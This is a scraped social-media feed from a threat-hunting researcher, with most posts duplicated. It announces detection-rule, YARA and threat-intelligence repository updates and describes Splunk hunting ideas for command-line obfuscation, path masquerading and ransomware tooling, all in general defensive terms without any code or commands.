mthcht
@mthcht.bsky.social
Threat Hunting - DFIR - Detection Engineering
🐙 https://github.com/mthcht
🐦 https://x.com/mthcht
📰 https://mthcht.medium.com
🐙 https://github.com/mthcht
🐦 https://x.com/mthcht
📰 https://mthcht.medium.com
🎭 #ThreatHunting February updates 🎭
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
March 2, 2025 at 10:15 PM
🎭 #ThreatHunting February updates 🎭
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬 yara: github.com/mthcht/Threa...
🐾 Specific artifact lists: github.com/mthcht/aweso...
It's growing! Now at 38 services and 82 projects 🙈 What's your favorite LoLC2?
February 19, 2025 at 6:44 PM
It's growing! Now at 38 services and 82 projects 🙈 What's your favorite LoLC2?
Path masquerading zerosalarium.com/2025/01/path...
Interesting technique, if you're hunting for this, you can directly search the unicode characters in Splunk 🥷
Interesting technique, if you're hunting for this, you can directly search the unicode characters in Splunk 🥷
February 13, 2025 at 1:35 AM
Path masquerading zerosalarium.com/2025/01/path...
Interesting technique, if you're hunting for this, you can directly search the unicode characters in Splunk 🥷
Interesting technique, if you're hunting for this, you can directly search the unicode characters in Splunk 🥷
Most SOCs handle hundreds to thousands of detection rules in their SIEM. Proper categorization is essential when creating a new detection, as it helps define criticality, urgency, implementation effort, and verbosity level. Keeping things structured will reducing alert fatigue!
February 12, 2025 at 2:07 AM
Most SOCs handle hundreds to thousands of detection rules in their SIEM. Proper categorization is essential when creating a new detection, as it helps define criticality, urgency, implementation effort, and verbosity level. Keeping things structured will reducing alert fatigue!
Hexadecimal IP Detection:
Identifiy hexadecimal IP addresses format in command lines with a "simple" regex (some default behaviors to exclude)
Identifiy hexadecimal IP addresses format in command lines with a "simple" regex (some default behaviors to exclude)
February 9, 2025 at 7:06 PM
Hexadecimal IP Detection:
Identifiy hexadecimal IP addresses format in command lines with a "simple" regex (some default behaviors to exclude)
Identifiy hexadecimal IP addresses format in command lines with a "simple" regex (some default behaviors to exclude)
Special Caracters anomaly Detection:
This query Extracts common special caracters from the process command line, counts occurrences, calculates ratio, and return commands with more than 20% specials caracters in it, could catch the quote insertions and url transformers techniques
This query Extracts common special caracters from the process command line, counts occurrences, calculates ratio, and return commands with more than 20% specials caracters in it, could catch the quote insertions and url transformers techniques
February 9, 2025 at 7:06 PM
Special Caracters anomaly Detection:
This query Extracts common special caracters from the process command line, counts occurrences, calculates ratio, and return commands with more than 20% specials caracters in it, could catch the quote insertions and url transformers techniques
This query Extracts common special caracters from the process command line, counts occurrences, calculates ratio, and return commands with more than 20% specials caracters in it, could catch the quote insertions and url transformers techniques
#ThreatHunting ideas for detecting command-line obfuscation techniques from github.com/wietze/Invok... with Splunk!
(examples with EID 4688)
Mixed Case Randomization Detection:
This query counts uppercase/lowercase letters and return command lines with a near-equal ratio
(examples with EID 4688)
Mixed Case Randomization Detection:
This query counts uppercase/lowercase letters and return command lines with a near-equal ratio
February 9, 2025 at 7:06 PM
#ThreatHunting ideas for detecting command-line obfuscation techniques from github.com/wietze/Invok... with Splunk!
(examples with EID 4688)
Mixed Case Randomization Detection:
This query counts uppercase/lowercase letters and return command lines with a near-equal ratio
(examples with EID 4688)
Mixed Case Randomization Detection:
This query counts uppercase/lowercase letters and return command lines with a near-equal ratio
I have a list of NS used for sinkhole domains and seized servers: raw.githubusercontent.com/mthcht/awesome…
I'm searching for the domains, on my server I can resolve a record type for ~400 million domains per day with github.com/blechschmidt/m��� 😃 Massive improvement compared to other solutions!
I'm searching for the domains, on my server I can resolve a record type for ~400 million domains per day with github.com/blechschmidt/m��� 😃 Massive improvement compared to other solutions!
February 9, 2025 at 7:01 PM
I have a list of NS used for sinkhole domains and seized servers: raw.githubusercontent.com/mthcht/awesome…
I'm searching for the domains, on my server I can resolve a record type for ~400 million domains per day with github.com/blechschmidt/m��� 😃 Massive improvement compared to other solutions!
I'm searching for the domains, on my server I can resolve a record type for ~400 million domains per day with github.com/blechschmidt/m��� 😃 Massive improvement compared to other solutions!
❄️ #ThreatHunting December + January updates ❄️
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬yara: github.com/mthcht/Threa...
🐾Specific artifact lists: github.com/mthcht/aweso...
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬yara: github.com/mthcht/Threa...
🐾Specific artifact lists: github.com/mthcht/aweso...
January 29, 2025 at 8:54 AM
❄️ #ThreatHunting December + January updates ❄️
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬yara: github.com/mthcht/Threa...
🐾Specific artifact lists: github.com/mthcht/aweso...
🐙 release: github.com/mthcht/Threa...
🌐 Site: mthcht.github.io/ThreatHuntin...
🧬yara: github.com/mthcht/Threa...
🐾Specific artifact lists: github.com/mthcht/aweso...
I like these Threat Profiles pages! grab the IOCs, cross-check with your database, kick off a quick hunt 👌
app.validin.com
app.validin.com
January 28, 2025 at 5:28 PM
I like these Threat Profiles pages! grab the IOCs, cross-check with your database, kick off a quick hunt 👌
app.validin.com
app.validin.com
I just pushed a huge update to the project with 5,000 new reports, bringing the total to over 16,000! The next one’s going to be massive too!
December 18, 2024 at 7:14 PM
I just pushed a huge update to the project with 5,000 new reports, bringing the total to over 16,000! The next one’s going to be massive too!
Pretty sure not many are hunting for VM tool usages. This persistence technique, used by Ragnar Locker ransomware, deserves more attention from defenders: embracethered.com/blog/shadowb...
December 15, 2024 at 2:28 PM
Pretty sure not many are hunting for VM tool usages. This persistence technique, used by Ragnar Locker ransomware, deserves more attention from defenders: embracethered.com/blog/shadowb...
My intelligence-gathering sheet for planning #ThreatHunting sessions
December 9, 2024 at 10:44 AM
My intelligence-gathering sheet for planning #ThreatHunting sessions
Knowledge is power!
Prepare your #ThreatHunting sessions by gathering intelligence reports on specific topics - could be tools, patterns, or threat actor groups
🏛️ mthcht.github.io/ThreatIntel-...
Now featuring more than 1,000 search results in over 11,000 Intelligence Reports updated regularly!
Prepare your #ThreatHunting sessions by gathering intelligence reports on specific topics - could be tools, patterns, or threat actor groups
🏛️ mthcht.github.io/ThreatIntel-...
Now featuring more than 1,000 search results in over 11,000 Intelligence Reports updated regularly!
December 9, 2024 at 1:12 AM
Knowledge is power!
Prepare your #ThreatHunting sessions by gathering intelligence reports on specific topics - could be tools, patterns, or threat actor groups
🏛️ mthcht.github.io/ThreatIntel-...
Now featuring more than 1,000 search results in over 11,000 Intelligence Reports updated regularly!
Prepare your #ThreatHunting sessions by gathering intelligence reports on specific topics - could be tools, patterns, or threat actor groups
🏛️ mthcht.github.io/ThreatIntel-...
Now featuring more than 1,000 search results in over 11,000 Intelligence Reports updated regularly!
On the hunt for all the tools this ransomware group used 🔭
December 8, 2024 at 2:57 PM
On the hunt for all the tools this ransomware group used 🔭
Apparently, this is a thing 🤔 the legit Ookla speedtest.exe downloaded and executed by Dagon Locker and Dispossesor ransomware group (as far as i know) for network assessment
December 4, 2024 at 11:36 PM
Apparently, this is a thing 🤔 the legit Ookla speedtest.exe downloaded and executed by Dagon Locker and Dispossesor ransomware group (as far as i know) for network assessment
Great training materials available here:
github.com/mthcht/aweso...
github.com/mthcht/aweso...
November 18, 2024 at 9:45 PM
Great training materials available here:
github.com/mthcht/aweso...
github.com/mthcht/aweso...
A regex to hunt for this phishing pattern in the file_path field with Splunk 🔎
November 18, 2024 at 7:26 PM
A regex to hunt for this phishing pattern in the file_path field with Splunk 🔎
November 10, 2024 at 6:20 AM